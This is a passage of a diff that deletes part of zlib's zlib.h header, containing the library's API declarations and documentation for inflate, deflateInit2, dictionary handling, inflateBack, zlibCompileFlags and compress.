-  total_out bytes) and returns Z_OK, Z_STREAM_END or an error code as described
-  below.  At the end of the stream, inflate() checks that its computed Adler-32
-  checksum is equal to that saved by the compressor and returns Z_STREAM_END
-  only if the checksum is correct.
-
-    inflate() can decompress and check either zlib-wrapped or gzip-wrapped
-  deflate data.  The header type is detected automatically, if requested when
-  initializing with inflateInit2().  Any information contained in the gzip
-  header is not retained unless inflateGetHeader() is used.  When processing
-  gzip-wrapped deflate data, strm->adler32 is set to the CRC-32 of the output
-  produced so far.  The CRC-32 is checked against the gzip trailer, as is the
-  uncompressed length, modulo 2^32.
-
-    inflate() returns Z_OK if some progress has been made (more input processed
-  or more output produced), Z_STREAM_END if the end of the compressed data has
-  been reached and all uncompressed output has been produced, Z_NEED_DICT if a
-  preset dictionary is needed at this point, Z_DATA_ERROR if the input data was
-  corrupted (input stream not conforming to the zlib format or incorrect check
-  value, in which case strm->msg points to a string with a more specific
-  error), Z_STREAM_ERROR if the stream structure was inconsistent (for example
-  next_in or next_out was Z_NULL, or the state was inadvertently written over
-  by the application), Z_MEM_ERROR if there was not enough memory, Z_BUF_ERROR
-  if no progress was possible or if there was not enough room in the output
-  buffer when Z_FINISH is used.  Note that Z_BUF_ERROR is not fatal, and
-  inflate() can be called again with more input and more output space to
-  continue decompressing.  If Z_DATA_ERROR is returned, the application may
-  then call inflateSync() to look for a good compression block if a partial
-  recovery of the data is to be attempted.
-*/
-
-
-ZEXTERN int ZEXPORT inflateEnd OF((z_streamp strm));
-/*
-     All dynamically allocated data structures for this stream are freed.
-   This function discards any unprocessed input and does not flush any pending
-   output.
-
-     inflateEnd returns Z_OK if success, or Z_STREAM_ERROR if the stream state
-   was inconsistent.
-*/
-
-
-                        /* Advanced functions */
-
-/*
-    The following functions are needed only in some special applications.
-*/
-
-/*
-ZEXTERN int ZEXPORT deflateInit2 OF((z_streamp strm,
-                                     int  level,
-                                     int  method,
-                                     int  windowBits,
-                                     int  memLevel,
-                                     int  strategy));
-
-     This is another version of deflateInit with more compression options.  The
-   fields next_in, zalloc, zfree and opaque must be initialized before by the
-   caller.
-
-     The method parameter is the compression method.  It must be Z_DEFLATED in
-   this version of the library.
-
-     The windowBits parameter is the base two logarithm of the window size
-   (the size of the history buffer).  It should be in the range 8..15 for this
-   version of the library.  Larger values of this parameter result in better
-   compression at the expense of memory usage.  The default value is 15 if
-   deflateInit is used instead.
-
-     For the current implementation of deflate(), a windowBits value of 8 (a
-   window size of 256 bytes) is not supported.  As a result, a request for 8
-   will result in 9 (a 512-byte window).  In that case, providing 8 to
-   inflateInit2() will result in an error when the zlib header with 9 is
-   checked against the initialization of inflate().  The remedy is to not use 8
-   with deflateInit2() with this initialization, or at least in that case use 9
-   with inflateInit2().
-
-     windowBits can also be -8..-15 for raw deflate.  In this case, -windowBits
-   determines the window size.  deflate() will then generate raw deflate data
-   with no zlib header or trailer, and will not compute a check value.
-
-     windowBits can also be greater than 15 for optional gzip encoding.  Add
-   16 to windowBits to write a simple gzip header and trailer around the
-   compressed data instead of a zlib wrapper.  The gzip header will have no
-   file name, no extra data, no comment, no modification time (set to zero), no
-   header crc, and the operating system will be set to the appropriate value,
-   if the operating system was determined at compile time.  If a gzip stream is
-   being written, strm->adler is a CRC-32 instead of an Adler-32.
-
-     For raw deflate or gzip encoding, a request for a 256-byte window is
-   rejected as invalid, since only the zlib header provides a means of
-   transmitting the window size to the decompressor.
-
-     The memLevel parameter specifies how much memory should be allocated
-   for the internal compression state.  memLevel=1 uses minimum memory but is
-   slow and reduces compression ratio; memLevel=9 uses maximum memory for
-   optimal speed.  The default value is 8.  See zconf.h for total memory usage
-   as a function of windowBits and memLevel.
-
-     The strategy parameter is used to tune the compression algorithm.  Use the
-   value Z_DEFAULT_STRATEGY for normal data, Z_FILTERED for data produced by a
-   filter (or predictor), Z_HUFFMAN_ONLY to force Huffman encoding only (no
-   string match), or Z_RLE to limit match distances to one (run-length
-   encoding).  Filtered data consists mostly of small values with a somewhat
-   random distribution.  In this case, the compression algorithm is tuned to
-   compress them better.  The effect of Z_FILTERED is to force more Huffman
-   coding and less string matching; it is somewhat intermediate between
-   Z_DEFAULT_STRATEGY and Z_HUFFMAN_ONLY.  Z_RLE is designed to be almost as
-   fast as Z_HUFFMAN_ONLY, but give better compression for PNG image data.  The
-   strategy parameter only affects the compression ratio but not the
-   correctness of the compressed output even if it is not set appropriately.
-   Z_FIXED prevents the use of dynamic Huffman codes, allowing for a simpler
-   decoder for special applications.
-
-     deflateInit2 returns Z_OK if success, Z_MEM_ERROR if there was not enough
-   memory, Z_STREAM_ERROR if any parameter is invalid (such as an invalid
-   method), or Z_VERSION_ERROR if the zlib library version (zlib_version) is
-   incompatible with the version assumed by the caller (ZLIB_VERSION).  msg is
-   set to null if there is no error message.  deflateInit2 does not perform any
-   compression: this will be done by deflate().
-*/
-
-ZEXTERN int ZEXPORT deflateSetDictionary OF((z_streamp strm,
-                                             const Bytef *dictionary,
-                                             uInt  dictLength));
-/*
-     Initializes the compression dictionary from the given byte sequence
-   without producing any compressed output.  When using the zlib format, this
-   function must be called immediately after deflateInit, deflateInit2 or
-   deflateReset, and before any call of deflate.  When doing raw deflate, this
-   function must be called either before any call of deflate, or immediately
-   after the completion of a deflate block, i.e. after all input has been
-   consumed and all output has been delivered when using any of the flush
-   options Z_BLOCK, Z_PARTIAL_FLUSH, Z_SYNC_FLUSH, or Z_FULL_FLUSH.  The
-   compressor and decompressor must use exactly the same dictionary (see
-   inflateSetDictionary).
-
-     The dictionary should consist of strings (byte sequences) that are likely
-   to be encountered later in the data to be compressed, with the most commonly
-   used strings preferably put towards the end of the dictionary.  Using a
-   dictionary is most useful when the data to be compressed is short and can be
-   predicted with good accuracy; the data can then be compressed better than
-   with the default empty dictionary.
-
-     Depending on the size of the compression data structures selected by
-   deflateInit or deflateInit2, a part of the dictionary may in effect be
-   discarded, for example if the dictionary is larger than the window size
-   provided in deflateInit or deflateInit2.  Thus the strings most likely to be
-   useful should be put at the end of the dictionary, not at the front.  In
-   addition, the current implementation of deflate will use at most the window
-   size minus 262 bytes of the provided dictionary.
-
-     Upon return of this function, strm->adler is set to the Adler-32 value
-   of the dictionary; the decompressor may later use this value to determine
-   which dictionary has been used by the compressor.  (The Adler-32 value
-   applies to the whole dictionary even if only a subset of the dictionary is
-   actually used by the compressor.) If a raw deflate was requested, then the
-   Adler-32 value is not computed and strm->adler is not set.
-
-     deflateSetDictionary returns Z_OK if success, or Z_STREAM_ERROR if a
-   parameter is invalid (e.g.  dictionary being Z_NULL) or the stream state is
-   inconsistent (for example if deflate has already been called for this stream
-   or if not at a block boundary for raw deflate).  deflateSetDictionary does
-   not perform any compression: this will be done by deflate().
-*/
-
-ZEXTERN int ZEXPORT deflateGetDictionary OF((z_streamp strm,
-                                             Bytef *dictionary,
-                                             uInt  *dictLength));
-/*
-     Returns the sliding dictionary being maintained by deflate.  dictLength is
-   set to the number of bytes in the dictionary, and that many bytes are copied
-   to dictionary.  dictionary must have enough space, where 32768 bytes is
-   always enough.  If deflateGetDictionary() is called with dictionary equal to
-   Z_NULL, then only the dictionary length is returned, and nothing is copied.
-   Similary, if dictLength is Z_NULL, then it is not set.
-
-     deflateGetDictionary() may return a length less than the window size, even
-   when more than the window size in input has been provided. It may return up
-   to 258 bytes less in that case, due to how zlib's implementation of deflate
-   manages the sliding window and lookahead for matches, where matches can be
-   up to 258 bytes long. If the application needs the last window-size bytes of
-   input, then that would need to be saved by the application outside of zlib.
-
-     deflateGetDictionary returns Z_OK on success, or Z_STREAM_ERROR if the
-   stream state is inconsistent.
-*/
-
-ZEXTERN int ZEXPORT deflateCopy OF((z_streamp dest,
-                                    z_streamp source));
-/*
-     Sets the destination stream as a complete copy of the source stream.
-
-     This function can be useful when several compression strategies will be
-   tried, for example when there are several ways of pre-processing the input
-   data with a filter.  The streams that will be discarded should then be freed
-   by calling deflateEnd.  Note that deflateCopy duplicates the internal
-   compression state which can be quite large, so this strategy is slow and can
-   consume lots of memory.
-
-     deflateCopy returns Z_OK if success, Z_MEM_ERROR if there was not
-   enough memory, Z_STREAM_ERROR if the source stream state was inconsistent
-   (such as zalloc being Z_NULL).  msg is left unchanged in both source and
-   destination.
-*/
-
-ZEXTERN int ZEXPORT deflateReset OF((z_streamp strm));
-/*
-     This function is equivalent to deflateEnd followed by deflateInit, but
-   does not free and reallocate the internal compression state.  The stream
-   will leave the compression level and any other attributes that may have been
-   set unchanged.
-
-     deflateReset returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent (such as zalloc or state being Z_NULL).
-*/
-
-ZEXTERN int ZEXPORT deflateParams OF((z_streamp strm,
-                                      int level,
-                                      int strategy));
-/*
-     Dynamically update the compression level and compression strategy.  The
-   interpretation of level and strategy is as in deflateInit2().  This can be
-   used to switch between compression and straight copy of the input data, or
-   to switch to a different kind of input data requiring a different strategy.
-   If the compression approach (which is a function of the level) or the
-   strategy is changed, and if any input has been consumed in a previous
-   deflate() call, then the input available so far is compressed with the old
-   level and strategy using deflate(strm, Z_BLOCK).  There are three approaches
-   for the compression levels 0, 1..3, and 4..9 respectively.  The new level
-   and strategy will take effect at the next call of deflate().
-
-     If a deflate(strm, Z_BLOCK) is performed by deflateParams(), and it does
-   not have enough output space to complete, then the parameter change will not
-   take effect.  In this case, deflateParams() can be called again with the
-   same parameters and more output space to try again.
-
-     In order to assure a change in the parameters on the first try, the
-   deflate stream should be flushed using deflate() with Z_BLOCK or other flush
-   request until strm.avail_out is not zero, before calling deflateParams().
-   Then no more input data should be provided before the deflateParams() call.
-   If this is done, the old level and strategy will be applied to the data
-   compressed before deflateParams(), and the new level and strategy will be
-   applied to the the data compressed after deflateParams().
-
-     deflateParams returns Z_OK on success, Z_STREAM_ERROR if the source stream
-   state was inconsistent or if a parameter was invalid, or Z_BUF_ERROR if
-   there was not enough output space to complete the compression of the
-   available input data before a change in the strategy or approach.  Note that
-   in the case of a Z_BUF_ERROR, the parameters are not changed.  A return
-   value of Z_BUF_ERROR is not fatal, in which case deflateParams() can be
-   retried with more output space.
-*/
-
-ZEXTERN int ZEXPORT deflateTune OF((z_streamp strm,
-                                    int good_length,
-                                    int max_lazy,
-                                    int nice_length,
-                                    int max_chain));
-/*
-     Fine tune deflate's internal compression parameters.  This should only be
-   used by someone who understands the algorithm used by zlib's deflate for
-   searching for the best matching string, and even then only by the most
-   fanatic optimizer trying to squeeze out the last compressed bit for their
-   specific input data.  Read the deflate.c source code for the meaning of the
-   max_lazy, good_length, nice_length, and max_chain parameters.
-
-     deflateTune() can be called after deflateInit() or deflateInit2(), and
-   returns Z_OK on success, or Z_STREAM_ERROR for an invalid deflate stream.
- */
-
-ZEXTERN uLong ZEXPORT deflateBound OF((z_streamp strm,
-                                       uLong sourceLen));
-/*
-     deflateBound() returns an upper bound on the compressed size after
-   deflation of sourceLen bytes.  It must be called after deflateInit() or
-   deflateInit2(), and after deflateSetHeader(), if used.  This would be used
-   to allocate an output buffer for deflation in a single pass, and so would be
-   called before deflate().  If that first deflate() call is provided the
-   sourceLen input bytes, an output buffer allocated to the size returned by
-   deflateBound(), and the flush value Z_FINISH, then deflate() is guaranteed
-   to return Z_STREAM_END.  Note that it is possible for the compressed size to
-   be larger than the value returned by deflateBound() if flush options other
-   than Z_FINISH or Z_NO_FLUSH are used.
-*/
-
-ZEXTERN int ZEXPORT deflatePending OF((z_streamp strm,
-                                       unsigned *pending,
-                                       int *bits));
-/*
-     deflatePending() returns the number of bytes and bits of output that have
-   been generated, but not yet provided in the available output.  The bytes not
-   provided would be due to the available output space having being consumed.
-   The number of bits of output not provided are between 0 and 7, where they
-   await more bits to join them in order to fill out a full byte.  If pending
-   or bits are Z_NULL, then those values are not set.
-
-     deflatePending returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent.
- */
-
-ZEXTERN int ZEXPORT deflatePrime OF((z_streamp strm,
-                                     int bits,
-                                     int value));
-/*
-     deflatePrime() inserts bits in the deflate output stream.  The intent
-   is that this function is used to start off the deflate output with the bits
-   leftover from a previous deflate stream when appending to it.  As such, this
-   function can only be used for raw deflate, and must be used before the first
-   deflate() call after a deflateInit2() or deflateReset().  bits must be less
-   than or equal to 16, and that many of the least significant bits of value
-   will be inserted in the output.
-
-     deflatePrime returns Z_OK if success, Z_BUF_ERROR if there was not enough
-   room in the internal buffer to insert the bits, or Z_STREAM_ERROR if the
-   source stream state was inconsistent.
-*/
-
-ZEXTERN int ZEXPORT deflateSetHeader OF((z_streamp strm,
-                                         gz_headerp head));
-/*
-     deflateSetHeader() provides gzip header information for when a gzip
-   stream is requested by deflateInit2().  deflateSetHeader() may be called
-   after deflateInit2() or deflateReset() and before the first call of
-   deflate().  The text, time, os, extra field, name, and comment information
-   in the provided gz_header structure are written to the gzip header (xflag is
-   ignored -- the extra flags are set according to the compression level).  The
-   caller must assure that, if not Z_NULL, name and comment are terminated with
-   a zero byte, and that if extra is not Z_NULL, that extra_len bytes are
-   available there.  If hcrc is true, a gzip header crc is included.  Note that
-   the current versions of the command-line version of gzip (up through version
-   1.3.x) do not support header crc's, and will report that it is a "multi-part
-   gzip file" and give up.
-
-     If deflateSetHeader is not used, the default gzip header has text false,
-   the time set to zero, and os set to 255, with no extra, name, or comment
-   fields.  The gzip header is returned to the default state by deflateReset().
-
-     deflateSetHeader returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent.
-*/
-
-/*
-ZEXTERN int ZEXPORT inflateInit2 OF((z_streamp strm,
-                                     int  windowBits));
-
-     This is another version of inflateInit with an extra parameter.  The
-   fields next_in, avail_in, zalloc, zfree and opaque must be initialized
-   before by the caller.
-
-     The windowBits parameter is the base two logarithm of the maximum window
-   size (the size of the history buffer).  It should be in the range 8..15 for
-   this version of the library.  The default value is 15 if inflateInit is used
-   instead.  windowBits must be greater than or equal to the windowBits value
-   provided to deflateInit2() while compressing, or it must be equal to 15 if
-   deflateInit2() was not used.  If a compressed stream with a larger window
-   size is given as input, inflate() will return with the error code
-   Z_DATA_ERROR instead of trying to allocate a larger window.
-
-     windowBits can also be zero to request that inflate use the window size in
-   the zlib header of the compressed stream.
-
-     windowBits can also be -8..-15 for raw inflate.  In this case, -windowBits
-   determines the window size.  inflate() will then process raw deflate data,
-   not looking for a zlib or gzip header, not generating a check value, and not
-   looking for any check values for comparison at the end of the stream.  This
-   is for use with other formats that use the deflate compressed data format
-   such as zip.  Those formats provide their own check values.  If a custom
-   format is developed using the raw deflate format for compressed data, it is
-   recommended that a check value such as an Adler-32 or a CRC-32 be applied to
-   the uncompressed data as is done in the zlib, gzip, and zip formats.  For
-   most applications, the zlib format should be used as is.  Note that comments
-   above on the use in deflateInit2() applies to the magnitude of windowBits.
-
-     windowBits can also be greater than 15 for optional gzip decoding.  Add
-   32 to windowBits to enable zlib and gzip decoding with automatic header
-   detection, or add 16 to decode only the gzip format (the zlib format will
-   return a Z_DATA_ERROR).  If a gzip stream is being decoded, strm->adler is a
-   CRC-32 instead of an Adler-32.  Unlike the gunzip utility and gzread() (see
-   below), inflate() will not automatically decode concatenated gzip streams.
-   inflate() will return Z_STREAM_END at the end of the gzip stream.  The state
-   would need to be reset to continue decoding a subsequent gzip stream.
-
-     inflateInit2 returns Z_OK if success, Z_MEM_ERROR if there was not enough
-   memory, Z_VERSION_ERROR if the zlib library version is incompatible with the
-   version assumed by the caller, or Z_STREAM_ERROR if the parameters are
-   invalid, such as a null pointer to the structure.  msg is set to null if
-   there is no error message.  inflateInit2 does not perform any decompression
-   apart from possibly reading the zlib header if present: actual decompression
-   will be done by inflate().  (So next_in and avail_in may be modified, but
-   next_out and avail_out are unused and unchanged.) The current implementation
-   of inflateInit2() does not process any header information -- that is
-   deferred until inflate() is called.
-*/
-
-ZEXTERN int ZEXPORT inflateSetDictionary OF((z_streamp strm,
-                                             const Bytef *dictionary,
-                                             uInt  dictLength));
-/*
-     Initializes the decompression dictionary from the given uncompressed byte
-   sequence.  This function must be called immediately after a call of inflate,
-   if that call returned Z_NEED_DICT.  The dictionary chosen by the compressor
-   can be determined from the Adler-32 value returned by that call of inflate.
-   The compressor and decompressor must use exactly the same dictionary (see
-   deflateSetDictionary).  For raw inflate, this function can be called at any
-   time to set the dictionary.  If the provided dictionary is smaller than the
-   window and there is already data in the window, then the provided dictionary
-   will amend what's there.  The application must insure that the dictionary
-   that was used for compression is provided.
-
-     inflateSetDictionary returns Z_OK if success, Z_STREAM_ERROR if a
-   parameter is invalid (e.g.  dictionary being Z_NULL) or the stream state is
-   inconsistent, Z_DATA_ERROR if the given dictionary doesn't match the
-   expected one (incorrect Adler-32 value).  inflateSetDictionary does not
-   perform any decompression: this will be done by subsequent calls of
-   inflate().
-*/
-
-ZEXTERN int ZEXPORT inflateGetDictionary OF((z_streamp strm,
-                                             Bytef *dictionary,
-                                             uInt  *dictLength));
-/*
-     Returns the sliding dictionary being maintained by inflate.  dictLength is
-   set to the number of bytes in the dictionary, and that many bytes are copied
-   to dictionary.  dictionary must have enough space, where 32768 bytes is
-   always enough.  If inflateGetDictionary() is called with dictionary equal to
-   Z_NULL, then only the dictionary length is returned, and nothing is copied.
-   Similary, if dictLength is Z_NULL, then it is not set.
-
-     inflateGetDictionary returns Z_OK on success, or Z_STREAM_ERROR if the
-   stream state is inconsistent.
-*/
-
-ZEXTERN int ZEXPORT inflateSync OF((z_streamp strm));
-/*
-     Skips invalid compressed data until a possible full flush point (see above
-   for the description of deflate with Z_FULL_FLUSH) can be found, or until all
-   available input is skipped.  No output is provided.
-
-     inflateSync searches for a 00 00 FF FF pattern in the compressed data.
-   All full flush points have this pattern, but not all occurrences of this
-   pattern are full flush points.
-
-     inflateSync returns Z_OK if a possible full flush point has been found,
-   Z_BUF_ERROR if no more input was provided, Z_DATA_ERROR if no flush point
-   has been found, or Z_STREAM_ERROR if the stream structure was inconsistent.
-   In the success case, the application may save the current current value of
-   total_in which indicates where valid compressed data was found.  In the
-   error case, the application may repeatedly call inflateSync, providing more
-   input each time, until success or end of the input data.
-*/
-
-ZEXTERN int ZEXPORT inflateCopy OF((z_streamp dest,
-                                    z_streamp source));
-/*
-     Sets the destination stream as a complete copy of the source stream.
-
-     This function can be useful when randomly accessing a large stream.  The
-   first pass through the stream can periodically record the inflate state,
-   allowing restarting inflate at those points when randomly accessing the
-   stream.
-
-     inflateCopy returns Z_OK if success, Z_MEM_ERROR if there was not
-   enough memory, Z_STREAM_ERROR if the source stream state was inconsistent
-   (such as zalloc being Z_NULL).  msg is left unchanged in both source and
-   destination.
-*/
-
-ZEXTERN int ZEXPORT inflateReset OF((z_streamp strm));
-/*
-     This function is equivalent to inflateEnd followed by inflateInit,
-   but does not free and reallocate the internal decompression state.  The
-   stream will keep attributes that may have been set by inflateInit2.
-
-     inflateReset returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent (such as zalloc or state being Z_NULL).
-*/
-
-ZEXTERN int ZEXPORT inflateReset2 OF((z_streamp strm,
-                                      int windowBits));
-/*
-     This function is the same as inflateReset, but it also permits changing
-   the wrap and window size requests.  The windowBits parameter is interpreted
-   the same as it is for inflateInit2.  If the window size is changed, then the
-   memory allocated for the window is freed, and the window will be reallocated
-   by inflate() if needed.
-
-     inflateReset2 returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent (such as zalloc or state being Z_NULL), or if
-   the windowBits parameter is invalid.
-*/
-
-ZEXTERN int ZEXPORT inflatePrime OF((z_streamp strm,
-                                     int bits,
-                                     int value));
-/*
-     This function inserts bits in the inflate input stream.  The intent is
-   that this function is used to start inflating at a bit position in the
-   middle of a byte.  The provided bits will be used before any bytes are used
-   from next_in.  This function should only be used with raw inflate, and
-   should be used before the first inflate() call after inflateInit2() or
-   inflateReset().  bits must be less than or equal to 16, and that many of the
-   least significant bits of value will be inserted in the input.
-
-     If bits is negative, then the input stream bit buffer is emptied.  Then
-   inflatePrime() can be called again to put bits in the buffer.  This is used
-   to clear out bits leftover after feeding inflate a block description prior
-   to feeding inflate codes.
-
-     inflatePrime returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent.
-*/
-
-ZEXTERN long ZEXPORT inflateMark OF((z_streamp strm));
-/*
-     This function returns two values, one in the lower 16 bits of the return
-   value, and the other in the remaining upper bits, obtained by shifting the
-   return value down 16 bits.  If the upper value is -1 and the lower value is
-   zero, then inflate() is currently decoding information outside of a block.
-   If the upper value is -1 and the lower value is non-zero, then inflate is in
-   the middle of a stored block, with the lower value equaling the number of
-   bytes from the input remaining to copy.  If the upper value is not -1, then
-   it is the number of bits back from the current bit position in the input of
-   the code (literal or length/distance pair) currently being processed.  In
-   that case the lower value is the number of bytes already emitted for that
-   code.
-
-     A code is being processed if inflate is waiting for more input to complete
-   decoding of the code, or if it has completed decoding but is waiting for
-   more output space to write the literal or match data.
-
-     inflateMark() is used to mark locations in the input data for random
-   access, which may be at bit positions, and to note those cases where the
-   output of a code may span boundaries of random access blocks.  The current
-   location in the input stream can be determined from avail_in and data_type
-   as noted in the description for the Z_BLOCK flush parameter for inflate.
-
-     inflateMark returns the value noted above, or -65536 if the provided
-   source stream state was inconsistent.
-*/
-
-ZEXTERN int ZEXPORT inflateGetHeader OF((z_streamp strm,
-                                         gz_headerp head));
-/*
-     inflateGetHeader() requests that gzip header information be stored in the
-   provided gz_header structure.  inflateGetHeader() may be called after
-   inflateInit2() or inflateReset(), and before the first call of inflate().
-   As inflate() processes the gzip stream, head->done is zero until the header
-   is completed, at which time head->done is set to one.  If a zlib stream is
-   being decoded, then head->done is set to -1 to indicate that there will be
-   no gzip header information forthcoming.  Note that Z_BLOCK or Z_TREES can be
-   used to force inflate() to return immediately after header processing is
-   complete and before any actual data is decompressed.
-
-     The text, time, xflags, and os fields are filled in with the gzip header
-   contents.  hcrc is set to true if there is a header CRC.  (The header CRC
-   was valid if done is set to one.) If extra is not Z_NULL, then extra_max
-   contains the maximum number of bytes to write to extra.  Once done is true,
-   extra_len contains the actual extra field length, and extra contains the
-   extra field, or that field truncated if extra_max is less than extra_len.
-   If name is not Z_NULL, then up to name_max characters are written there,
-   terminated with a zero unless the length is greater than name_max.  If
-   comment is not Z_NULL, then up to comm_max characters are written there,
-   terminated with a zero unless the length is greater than comm_max.  When any
-   of extra, name, or comment are not Z_NULL and the respective field is not
-   present in the header, then that field is set to Z_NULL to signal its
-   absence.  This allows the use of deflateSetHeader() with the returned
-   structure to duplicate the header.  However if those fields are set to
-   allocated memory, then the application will need to save those pointers
-   elsewhere so that they can be eventually freed.
-
-     If inflateGetHeader is not used, then the header information is simply
-   discarded.  The header is always checked for validity, including the header
-   CRC if present.  inflateReset() will reset the process to discard the header
-   information.  The application would need to call inflateGetHeader() again to
-   retrieve the header from the next gzip stream.
-
-     inflateGetHeader returns Z_OK if success, or Z_STREAM_ERROR if the source
-   stream state was inconsistent.
-*/
-
-/*
-ZEXTERN int ZEXPORT inflateBackInit OF((z_streamp strm, int windowBits,
-                                        unsigned char FAR *window));
-
-     Initialize the internal stream state for decompression using inflateBack()
-   calls.  The fields zalloc, zfree and opaque in strm must be initialized
-   before the call.  If zalloc and zfree are Z_NULL, then the default library-
-   derived memory allocation routines are used.  windowBits is the base two
-   logarithm of the window size, in the range 8..15.  window is a caller
-   supplied buffer of that size.  Except for special applications where it is
-   assured that deflate was used with small window sizes, windowBits must be 15
-   and a 32K byte window must be supplied to be able to decompress general
-   deflate streams.
-
-     See inflateBack() for the usage of these routines.
-
-     inflateBackInit will return Z_OK on success, Z_STREAM_ERROR if any of
-   the parameters are invalid, Z_MEM_ERROR if the internal state could not be
-   allocated, or Z_VERSION_ERROR if the version of the library does not match
-   the version of the header file.
-*/
-
-typedef unsigned (*in_func) OF((void FAR *,
-                                z_const unsigned char FAR * FAR *));
-typedef int (*out_func) OF((void FAR *, unsigned char FAR *, unsigned));
-
-ZEXTERN int ZEXPORT inflateBack OF((z_streamp strm,
-                                    in_func in, void FAR *in_desc,
-                                    out_func out, void FAR *out_desc));
-/*
-     inflateBack() does a raw inflate with a single call using a call-back
-   interface for input and output.  This is potentially more efficient than
-   inflate() for file i/o applications, in that it avoids copying between the
-   output and the sliding window by simply making the window itself the output
-   buffer.  inflate() can be faster on modern CPUs when used with large
-   buffers.  inflateBack() trusts the application to not change the output
-   buffer passed by the output function, at least until inflateBack() returns.
-
-     inflateBackInit() must be called first to allocate the internal state
-   and to initialize the state with the user-provided window buffer.
-   inflateBack() may then be used multiple times to inflate a complete, raw
-   deflate stream with each call.  inflateBackEnd() is then called to free the
-   allocated state.
-
-     A raw deflate stream is one with no zlib or gzip header or trailer.
-   This routine would normally be used in a utility that reads zip or gzip
-   files and writes out uncompressed files.  The utility would decode the
-   header and process the trailer on its own, hence this routine expects only
-   the raw deflate stream to decompress.  This is different from the default
-   behavior of inflate(), which expects a zlib header and trailer around the
-   deflate stream.
-
-     inflateBack() uses two subroutines supplied by the caller that are then
-   called by inflateBack() for input and output.  inflateBack() calls those
-   routines until it reads a complete deflate stream and writes out all of the
-   uncompressed data, or until it encounters an error.  The function's
-   parameters and return types are defined above in the in_func and out_func
-   typedefs.  inflateBack() will call in(in_desc, &buf) which should return the
-   number of bytes of provided input, and a pointer to that input in buf.  If
-   there is no input available, in() must return zero -- buf is ignored in that
-   case -- and inflateBack() will return a buffer error.  inflateBack() will
-   call out(out_desc, buf, len) to write the uncompressed data buf[0..len-1].
-   out() should return zero on success, or non-zero on failure.  If out()
-   returns non-zero, inflateBack() will return with an error.  Neither in() nor
-   out() are permitted to change the contents of the window provided to
-   inflateBackInit(), which is also the buffer that out() uses to write from.
-   The length written by out() will be at most the window size.  Any non-zero
-   amount of input may be provided by in().
-
-     For convenience, inflateBack() can be provided input on the first call by
-   setting strm->next_in and strm->avail_in.  If that input is exhausted, then
-   in() will be called.  Therefore strm->next_in must be initialized before
-   calling inflateBack().  If strm->next_in is Z_NULL, then in() will be called
-   immediately for input.  If strm->next_in is not Z_NULL, then strm->avail_in
-   must also be initialized, and then if strm->avail_in is not zero, input will
-   initially be taken from strm->next_in[0 ..  strm->avail_in - 1].
-
-     The in_desc and out_desc parameters of inflateBack() is passed as the
-   first parameter of in() and out() respectively when they are called.  These
-   descriptors can be optionally used to pass any information that the caller-
-   supplied in() and out() functions need to do their job.
-
-     On return, inflateBack() will set strm->next_in and strm->avail_in to
-   pass back any unused input that was provided by the last in() call.  The
-   return values of inflateBack() can be Z_STREAM_END on success, Z_BUF_ERROR
-   if in() or out() returned an error, Z_DATA_ERROR if there was a format error
-   in the deflate stream (in which case strm->msg is set to indicate the nature
-   of the error), or Z_STREAM_ERROR if the stream was not properly initialized.
-   In the case of Z_BUF_ERROR, an input or output error can be distinguished
-   using strm->next_in which will be Z_NULL only if in() returned an error.  If
-   strm->next_in is not Z_NULL, then the Z_BUF_ERROR was due to out() returning
-   non-zero.  (in() will always be called before out(), so strm->next_in is
-   assured to be defined if out() returns non-zero.)  Note that inflateBack()
-   cannot return Z_OK.
-*/
-
-ZEXTERN int ZEXPORT inflateBackEnd OF((z_streamp strm));
-/*
-     All memory allocated by inflateBackInit() is freed.
-
-     inflateBackEnd() returns Z_OK on success, or Z_STREAM_ERROR if the stream
-   state was inconsistent.
-*/
-
-ZEXTERN uLong ZEXPORT zlibCompileFlags OF((void));
-/* Return flags indicating compile-time options.
-
-    Type sizes, two bits each, 00 = 16 bits, 01 = 32, 10 = 64, 11 = other:
-     1.0: size of uInt
-     3.2: size of uLong
-     5.4: size of voidpf (pointer)
-     7.6: size of z_off_t
-
-    Compiler, assembler, and debug options:
-     8: ZLIB_DEBUG
-     9: ASMV or ASMINF -- use ASM code
-     10: ZLIB_WINAPI -- exported functions use the WINAPI calling convention
-     11: 0 (reserved)
-
-    One-time table building (smaller code, but not thread-safe if true):
-     12: BUILDFIXED -- build static block decoding tables when needed
-     13: DYNAMIC_CRC_TABLE -- build CRC calculation tables when needed
-     14,15: 0 (reserved)
-
-    Library content (indicates missing functionality):
-     16: NO_GZCOMPRESS -- gz* functions cannot compress (to avoid linking
-                          deflate code when not needed)
-     17: NO_GZIP -- deflate can't write gzip streams, and inflate can't detect
-                    and decode gzip streams (to avoid linking crc code)
-     18-19: 0 (reserved)
-
-    Operation variations (changes in library functionality):
-     20: PKZIP_BUG_WORKAROUND -- slightly more permissive inflate
-     21: FASTEST -- deflate algorithm with only one, lowest compression level
-     22,23: 0 (reserved)
-
-    The sprintf variant used by gzprintf (zero is best):
-     24: 0 = vs*, 1 = s* -- 1 means limited to 20 arguments after the format
-     25: 0 = *nprintf, 1 = *printf -- 1 means gzprintf() not secure!
-     26: 0 = returns value, 1 = void -- 1 means inferred string length returned
-
-    Remainder:
-     27-31: 0 (reserved)
- */
-
-#ifndef Z_SOLO
-
-                        /* utility functions */
-
-/*
-     The following utility functions are implemented on top of the basic
-   stream-oriented functions.  To simplify the interface, some default options
-   are assumed (compression level and memory usage, standard memory allocation
-   functions).  The source code of these utility functions can be modified if
-   you need special options.
-*/
-
-ZEXTERN int ZEXPORT compress OF((Bytef *dest,   uLongf *destLen,
-                                 const Bytef *source, uLong sourceLen));
-/*
-     Compresses the source buffer into the destination buffer.  sourceLen is
-   the byte length of the source buffer.  Upon entry, destLen is the total size
-   of the destination buffer, which must be at least the value returned by
-   compressBound(sourceLen).  Upon exit, destLen is the actual size of the
-   compressed data.  compress() is equivalent to compress2() with a level
-   parameter of Z_DEFAULT_COMPRESSION.
-
-     compress returns Z_OK if success, Z_MEM_ERROR if there was not
-   enough memory, Z_BUF_ERROR if there was not enough room in the output
-   buffer.
-*/
-
-ZEXTERN int ZEXPORT compress2 OF((Bytef *dest,   uLongf *destLen,
-                                  const Bytef *source, uLong sourceLen,
